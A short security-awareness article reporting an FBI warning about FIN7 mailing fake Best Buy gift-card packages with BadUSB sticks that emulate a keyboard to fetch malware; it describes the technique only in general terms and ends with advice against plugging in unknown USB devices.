Recently, a warning was released to businesses from the FBI regarding a new ploy being used by the FIN7 gang (also known as the Navigator Group and the Carbanak Group). More than $1 billion in fraud has already been tied to the gang, most of which was taken through using malware to infect point-of-sale devices and using that to steal card details at the point of payment – FIN7’s typical attack.

BadUSB attacks

Recently however, the group has been deploying a new attack: The victim receives a package in the post containing a teddy bear, what appears to be a $50 gift card to Best Buy and a USB memory stick. A covering letter is also included in the package and reads ‘Best Buy company thanks you for being our regular customer for a long period of time, so we would like to send you a gift card to the amount of $50. You can spend it on any product from the list of items presented on the USB stick’. The attacker just needs the USB stick to be plugged into the victim’s computer.

The USB device that is sent inside of the package is a tool known as a ‘BadUSB’ or ‘Bad Beetle USB device’ and is commercially available. Attacks like this are also known as ‘Bash Bunny’ attacks. These BadUSB devices are most commonly used by penetration testers and have been described as a ‘relatively rare’ form of attack. However, last year there was a suspected attempted attack using a BadUSB at the Trump owned Mar-a-Lago resort.

These BadUSB devices have the potential to bypass antivirus programs and gain complete remote access to any system that the device is plugged into. BadUSBs can enable malicious attacks due to them having had their firmware rewritten. When a victim plugs the BadUSB into their computer it registers as an input device, a HID keyboard device. The BadUSB then sends a series of keystroke commands to the target computer that ultimately leads to a powershell command being run that downloads and then executes a malware payload from a server controller by the attacker. Reportedly, the current FIN7 attack then calls out to domains and IP addresses located in Russia.

This recent warning from the FBI should be a reminder to people to continue following best practises, in this instance to never plug an unknown USB device into your computer.